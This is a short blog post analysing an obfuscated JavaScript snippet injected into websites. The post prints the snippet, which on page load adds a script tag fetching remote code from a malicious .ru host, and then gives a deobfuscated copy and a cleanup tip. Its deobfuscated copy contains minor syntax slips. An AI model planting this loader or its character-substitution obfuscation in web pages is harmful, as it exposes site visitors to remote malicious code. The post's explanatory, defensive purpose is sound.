Friday, May 21, 2010

Malware Attack, Reply Comment

I refer to the recent comment from my previous malware attack posted 1.5 years ago. Basically the obscure script carried out a lot of substitutions to avoid any firewall filter.

Below is a sample my friend sent me 3 months ago.

/*GNU GPL*/ try{window.onload = function(){var Qq73s8yh02ptue2rq = document.createElement('s&(^c@#r$^i(@)p&@t($&'.replace(/#|\!|\(|&|@|\$|\

^|\)/ig, ''));Qq73s8yh02ptue2rq.setAttribute('type',
'text/javascript');Qq73s8yh02ptue2rq.setAttribute('src',
'h!!t(#(t#)^p(^!(:&$/$$$/$@)&h!^c&3$6^))#^0&-@!&c!o$()m&^&.))g(l^((o)b&$
#e&!)@7#^.!(c)##)o@)m#^.(@$k#(&)i^n$)#o^^@(-#)&$t@@^o)!.!@$^v)&i!@)e^#w&
h$&o&&m)((e#s)$!a@$l^^e).$(r)^&u(:(((!8&^@0!!8)))0^/#!)f#@r!i&&!)e$n&d&f
!$e&#e)$d)^.!c(^o)()^m^/@$f#(^!r#^@&@i(^e&n@(&(d$!f&!#e#!e@@$#@d).^!c#^^
^o^@!!m)($/$b!l#u^^$^e&$@@#h@^o))&!s#@$$t&#.@@@c)^(&o@m()^/$(^v^^$#e#o$#
h)(&.^$@c)(o^$)$m&/#g(!^o^^o!(^g@!&l!^#!^e&.&@c)!o)@&m!/(#!^^'.replace(/
\$|\(|@|\!|\)|#|\^|&/ig, ''));Qq73s8yh02ptue2rq.setAttribute('defer',
'defer');Qq73s8yh02ptue2rq.setAttribute('id',
'U&!^(y&$2(#3^9#^b)$$x^#k#^@9##)5(&t#@'.replace(/&|\!|\)|\^|\(|\$|@|#/ig
, ''));document.body.appendChild(Qq73s8yh02ptue2rq);}} catch(e) {} 

After ran through the browser JavaScript interpreter, you will get the below. It will dynamically create a <script> element which will be load up automatically.

/*GNU GPL*/ try{window.onload = function(){
 var Qq73s8yh02ptue2rq = document.createElement('script'));
 Qq73s8yh02ptue2rq.setAttribute('type','text/javascript');
 Qq73s8yh02ptue2rq.setAttribute('src','http://hc360-com.globe7.com.kino-to.viewhomesale.ru:8080/friendfeed.com/friendfeed.com/bluehost.com/veoh.com/google.com/'));
 Qq73s8yh02ptue2rq.setAttribute('defer','defer');
 Qq73s8yh02ptue2rq.setAttribute('id','Uy239bxk95t');
 document.body.appendChild(doc);}
} catch(e) {} 

If your html/js appear to have any window.onload which does not belong to your own stuff, you can apply the same trick by running 'sed' to clean it up.

Labels: ,

0 Comments:

Post a Comment

<< Home